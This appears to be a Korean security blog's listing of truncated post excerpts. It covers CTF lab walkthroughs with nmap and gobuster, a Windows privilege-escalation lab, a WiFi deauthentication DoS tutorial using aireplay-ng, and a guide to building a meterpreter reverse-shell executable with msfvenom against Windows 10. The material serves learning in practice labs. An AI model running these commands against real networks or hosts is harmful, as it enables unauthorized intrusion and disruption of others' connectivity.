건우Sec

TASK 1 Deploy the machine Task 2 Compromise the System  1. ANSWER : 얼마나 많은 포트가 있나요? 열린 포트22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Lin)80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) 2. ANSWER : 22 포트에 어떤 서비스가 운영중인가요? 3. ANSWER : 80 포트에 어떤 서비스가 운영중인가요? 4. ANSWER : user.txt 의 플래그는 무엇인가요? /admin                (Status: 301) [Size: 314] [--> http://10.10.168.201/admin/] /etc..

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

이번에 배워볼건 WIFI DOS 공격 이다 어뎁터 인식부터 해줍시다 airodump-ng wlan0 BSSID 에서 자신이 DOS 공격을 진행할 주소를 복사합니다 airodump-ng --bssid 50:46:AE:70:F7:62 -test wlan0현재 이 명령어는 한 BSSID 만 스캔하는것입니다 여기서 BSSID 와 STATION 이 있습니다 이둘을 복사해줍니다 하지만 channel 이 현재 bssid 와 다르다면 공격을 진행을 못합니다 채널 바꾸는법 sudo iwconfig wlan0 channel 3도스 어택 aireplay-ng --deauth 300000 -a -c wlan0 와이어샤크 (wireshark) wlan0 을 눌러줍니다이렇게 Deauthentication 이라는 문구를 출력하..

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..

와이파이 모의해킹 [ 환경설정 & 어뎁터 인식 ]이번 주제는 와이파이 모의해킹에 대헤서 다뤄보겠습니다. 제가 제일 좋아하는 해킹 과목입니다 ㅎㅎ 밑에 사진을 보시듯 얼마나 재밌게 한 해킹인지 감이 오실겁니다 위에 사진으로 말하자면 와아파이 기능을 해주고 모니터주입을 해주는 어뎁터입니다그전에 환경설정을 해줘야 하는데 칼리 리눅스에서는 WIFI 기능을 하지못해 직접 어뎁터를 사 인식을 해야하므로 칼리리눅스에 호환이 되는 어뎁터를 사야만합니다. 어뎁터 추천2G1. AWUS036NH https://www.coupang.com/vp/products/6984235480?itemId=17071993264&vendorItemId=84246075936&q=awus036nh&itemsCount=36&searchId=110..

TASK 1 Simple CTF 1. Answer : 1000포트 아래 포트들이 얼마나 운영중인가요? nmap -sV -sC -sT -Pn --script vuln 10.10.31.249 2. Answer : 가장높은 포트는 어떤 서비스를 이용중인가요?3. Answer : 해당 웹애플리케이션이 가지고있는 cve 취약점은 무엇인가요? apache 2 서비스를 운영중인 웹 애플리케이션이다. gobuster 툴을 이용해 숨겨진 경로를 확인해보자 gobuster dir -u [IP] -w [wordlist] /simple               (Status: 301) [Size: 313] [--> http://10.10.31.249/simple/]CMS 2.2.8 버전이다. 해당 CMS 2.2.8 버전은 S..

TASK 1. Deploy the machine TASK 2. Reconnaissance 1. Answer : 포트수가 얼마나 있나요?22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu) 22tcp/80tcp 가 열려있다 그러므로 총합 2개  2. Answer : 현재 apache 에 버전은 무엇인가요?80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu) 버전 : 2.4.293. Answer : 22 port 에 어떤 서비스가 동작하나요?22/tcp open  ssh     OpenSSH..